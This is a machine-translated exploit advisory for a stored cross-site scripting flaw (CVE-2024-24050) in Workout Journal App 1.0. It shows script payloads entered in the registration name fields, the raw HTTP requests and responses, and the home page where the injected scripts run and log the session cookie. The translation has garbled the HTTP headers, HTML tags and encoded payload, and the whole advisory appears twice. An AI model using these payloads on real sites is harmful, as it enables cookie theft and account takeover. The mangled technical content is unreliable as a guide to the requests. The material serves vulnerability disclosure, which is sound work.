#利用标题:锻炼期刊应用程序1.0-存储的XSS
#日期: 12.01.2024
#利用作者: Murat Cagri Alis
#供应商homepage3360 https://www.sourcecodester.comhttps...ng-php-php-and-php-and-mysql-source-code.html
#软件link: https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html
#版本: 1.0
#在: Windows/MacOS/Linux上测试
#CVE : CVE-2024-24050
# 描述
在Localhost上安装并运行应用程序的源代码。从url锻炼- journal/index.php的注册页面注册。注册时,可以在页面上的名字和姓氏输入存储的XSS有效载荷。在此页面上注册时,对于/workout-journal/endpoint/add-user.php url的请求中的第一个_name参数
对于last_name参数,键入'scriptConsole.log(document.cookie) /script'和'scriptconsole.log(1337) /script'。然后,当您登录时,您将被重定向到/workout-journal/home.php。当您在此处打开控制台时,您会看到存储的XSS正在工作。您还可以从页面的源代码中看到有效载荷正常工作。当用户在未经验证的情况下输入数据,然后允许浏览器执行此代码时,就会发生此漏洞。
#poc
将请求注册到/workout-journal/endpoints/add-user.php
post/workout-journal/endpoint/add-user.php http/1.1
HOST: LOCALHOST
内容长度: 268
cache-control: max-age=0
sec-ch-ua:'铬'; v='121','不是(品牌'; v='99'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'Windows'
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:应用程序/x-www-form-urlenceded
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/121.0.6167.167.160 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://localhost/锻炼-journal/index.php
Accept-incoding: Gzip,Deflate,br
Accept-Language: Tr-Tr,Tr; Q=0.9,En-US; Q=0.8,en; q=0.7
cookie: phpsessID=64S63VGQLNLTUJSRJ64C5O0VCI
连接:关闭
first_name=%3cscript%3 console.log%28Document.cookie%29%3C%2fscript%3E%29LAST_NAME=%3CScript%3Console.LOG%281337%29%29%3C%3C%2fscript%3 e%29位=85height=190birthday=1991-11-20contact_number=1234567890Email=test%40mail.mailusername.mailusername=testusernamepassword=test123456--
此请求在响应时回到200个代码
http/1.1 200好
Date:星期六,2024年3月16日02:05:52 GMT
Server: Apache/2.4.53(Win64)OpenSSL/1.1.1.1N PHP/8.1.4
X-Power-By: php/8.1.4
内容长度: 214
连接:关闭
content-type:文本/html; charset=UTF-8
脚本
警报(“成功注册帐户!”);
window.location.href='http://localhost/锻炼-journal/';
/脚本
所有这些之后,您可以转到登录页面并使用用户名和密码登录到系统。之后,您可以看到,在控制台有效载荷上有效。
/workout-journal/home.php请求
get/workout-journal/home.php http/1.1
HOST: LOCALHOST
sec-ch-ua:'铬'; v='121','不是(品牌'; v='99'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'Windows'
升级- 不肯定- requests: 1
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/121.0.6167.167.160 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-Dest:文档
Referer: http://localhost/锻炼- journal/endpoint/login.php
Accept-incoding: Gzip,Deflate,br
Accept-Language: Tr-Tr,Tr; Q=0.9,En-US; Q=0.8,en; q=0.7
cookie: phpsessid=co1vmea8hr1nctjvmid87fa7d1
连接:关闭
/workout-journal/home.php响应
http/1.1 200好
日期:星期六,2024年3月16日02:07:56格林尼治标准时间
Server: Apache/2.4.53(Win64)OpenSSL/1.1.1.1N PHP/8.1.4
X-Power-By: php/8.1.4
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control:无存储,无缓存,必须恢复活力
pragma:无缓存
内容长度: 2791
连接:关闭
content-type:文本/html; charset=UTF-8
!doctype html
html lang='en'
头
meta charset='utf-8'
meta name='viewport'content='width=设备宽度,初始尺度=1.0'
titleWorkout日记应用程序/标题
! - 样式CSS-
链接rel='stylesheet'href='。/Assets/style.css'
! - Bootstrap CSS-
链接rel='stylesheet'href='https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css'
风格
身体{
Overflow:隐藏;
}
/风格
/头
身体
div class='main'
nav class='navbar-expand-lg-lg navbar-dark-dark bg-dark'
a class='navbar-brand ml-3'href='#'锻炼日记应用程序/a
按钮class='navbar-toggler'type='button'data-toggle='collapse'data-target='#navbarsupportedContent'aria-controls='
跨度class='navbar-toggler-icon'/span
/按钮
div class='崩溃navbar-collapse'id='navbarsupportedContent'
UL类='Navbar-nav ml-auto'
li class='nav-item活动'
a class='nav-link'href='。/endpoint/logout.php'log out/a
/li
/div
/nav
DIV类='着陆页式''
div类='标题范围'
H2WELCOME scriptConsole.log(document.cookie);/script)scriptconsole.log(1337);/script)/h2
P您今天想做什么?/P
/div
DIV类='Select-Option'
div class='read-journal'onClick='redirectToreadJournal()'
img src='。/Assets/read.jpg'alt=''
预先您过去的锻炼期刊。/P
/div
div class='write-journal'onclick='redirectTowriteJournal()'
img src='。/Assets/write.jpg'alt=''
PWRITE您的当今日记。/P
/div
/div
/div
/div
! - Bootstrap JS-
脚本src='https://cdn.jsdelivr.net/npm/[email protected]/dist/jquery.slim.min.js'/script
脚本src='https://cdn.jsdelivr.net/npm/popper.js@[email protected]/dist/dist/umd/popper.min.js'/script
脚本src='https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.min.js'/script
! - 脚本JS-
脚本src='。/Assets/script.js'/脚本
/身体
/html
#日期: 12.01.2024
#利用作者: Murat Cagri Alis
#供应商homepage3360 https://www.sourcecodester.comhttps...ng-php-php-and-php-and-mysql-source-code.html
#软件link: https://www.sourcecodester.com/php/17088/workout-journal-app-using-php-and-mysql-source-code.html
#版本: 1.0
#在: Windows/MacOS/Linux上测试
#CVE : CVE-2024-24050
# 描述
在Localhost上安装并运行应用程序的源代码。从url锻炼- journal/index.php的注册页面注册。注册时,可以在页面上的名字和姓氏输入存储的XSS有效载荷。在此页面上注册时,对于/workout-journal/endpoint/add-user.php url的请求中的第一个_name参数
对于last_name参数,键入'scriptConsole.log(document.cookie) /script'和'scriptconsole.log(1337) /script'。然后,当您登录时,您将被重定向到/workout-journal/home.php。当您在此处打开控制台时,您会看到存储的XSS正在工作。您还可以从页面的源代码中看到有效载荷正常工作。当用户在未经验证的情况下输入数据,然后允许浏览器执行此代码时,就会发生此漏洞。
#poc
将请求注册到/workout-journal/endpoints/add-user.php
post/workout-journal/endpoint/add-user.php http/1.1
HOST: LOCALHOST
内容长度: 268
cache-control: max-age=0
sec-ch-ua:'铬'; v='121','不是(品牌'; v='99'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'Windows'
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:应用程序/x-www-form-urlenceded
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/121.0.6167.167.160 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://localhost/锻炼-journal/index.php
Accept-incoding: Gzip,Deflate,br
Accept-Language: Tr-Tr,Tr; Q=0.9,En-US; Q=0.8,en; q=0.7
cookie: phpsessID=64S63VGQLNLTUJSRJ64C5O0VCI
连接:关闭
first_name=%3cscript%3 console.log%28Document.cookie%29%3C%2fscript%3E%29LAST_NAME=%3CScript%3Console.LOG%281337%29%29%3C%3C%2fscript%3 e%29位=85height=190birthday=1991-11-20contact_number=1234567890Email=test%40mail.mailusername.mailusername=testusernamepassword=test123456--
此请求在响应时回到200个代码
http/1.1 200好
Date:星期六,2024年3月16日02:05:52 GMT
Server: Apache/2.4.53(Win64)OpenSSL/1.1.1.1N PHP/8.1.4
X-Power-By: php/8.1.4
内容长度: 214
连接:关闭
content-type:文本/html; charset=UTF-8
脚本
警报(“成功注册帐户!”);
window.location.href='http://localhost/锻炼-journal/';
/脚本
所有这些之后,您可以转到登录页面并使用用户名和密码登录到系统。之后,您可以看到,在控制台有效载荷上有效。
/workout-journal/home.php请求
get/workout-journal/home.php http/1.1
HOST: LOCALHOST
sec-ch-ua:'铬'; v='121','不是(品牌'; v='99'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'Windows'
升级- 不肯定- requests: 1
用户代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/121.0.6167.167.160 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-Dest:文档
Referer: http://localhost/锻炼- journal/endpoint/login.php
Accept-incoding: Gzip,Deflate,br
Accept-Language: Tr-Tr,Tr; Q=0.9,En-US; Q=0.8,en; q=0.7
cookie: phpsessid=co1vmea8hr1nctjvmid87fa7d1
连接:关闭
/workout-journal/home.php响应
http/1.1 200好
日期:星期六,2024年3月16日02:07:56格林尼治标准时间
Server: Apache/2.4.53(Win64)OpenSSL/1.1.1.1N PHP/8.1.4
X-Power-By: php/8.1.4
Expires: THU,1981年11月19日08333333333:00 GMT
cache-control:无存储,无缓存,必须恢复活力
pragma:无缓存
内容长度: 2791
连接:关闭
content-type:文本/html; charset=UTF-8
!doctype html
html lang='en'
头
meta charset='utf-8'
meta name='viewport'content='width=设备宽度,初始尺度=1.0'
titleWorkout日记应用程序/标题
! - 样式CSS-
链接rel='stylesheet'href='。/Assets/style.css'
! - Bootstrap CSS-
链接rel='stylesheet'href='https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css'
风格
身体{
Overflow:隐藏;
}
/风格
/头
身体
div class='main'
nav class='navbar-expand-lg-lg navbar-dark-dark bg-dark'
a class='navbar-brand ml-3'href='#'锻炼日记应用程序/a
按钮class='navbar-toggler'type='button'data-toggle='collapse'data-target='#navbarsupportedContent'aria-controls='
跨度class='navbar-toggler-icon'/span
/按钮
div class='崩溃navbar-collapse'id='navbarsupportedContent'
UL类='Navbar-nav ml-auto'
li class='nav-item活动'
a class='nav-link'href='。/endpoint/logout.php'log out/a
/li
/div
/nav
DIV类='着陆页式''
div类='标题范围'
H2WELCOME scriptConsole.log(document.cookie);/script)scriptconsole.log(1337);/script)/h2
P您今天想做什么?/P
/div
DIV类='Select-Option'
div class='read-journal'onClick='redirectToreadJournal()'
img src='。/Assets/read.jpg'alt=''
预先您过去的锻炼期刊。/P
/div
div class='write-journal'onclick='redirectTowriteJournal()'
img src='。/Assets/write.jpg'alt=''
PWRITE您的当今日记。/P
/div
/div
/div
/div
! - Bootstrap JS-
脚本src='https://cdn.jsdelivr.net/npm/[email protected]/dist/jquery.slim.min.js'/script
脚本src='https://cdn.jsdelivr.net/npm/popper.js@[email protected]/dist/dist/umd/popper.min.js'/script
脚本src='https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.min.js'/script
! - 脚本JS-
脚本src='。/Assets/script.js'/脚本
/身体
/html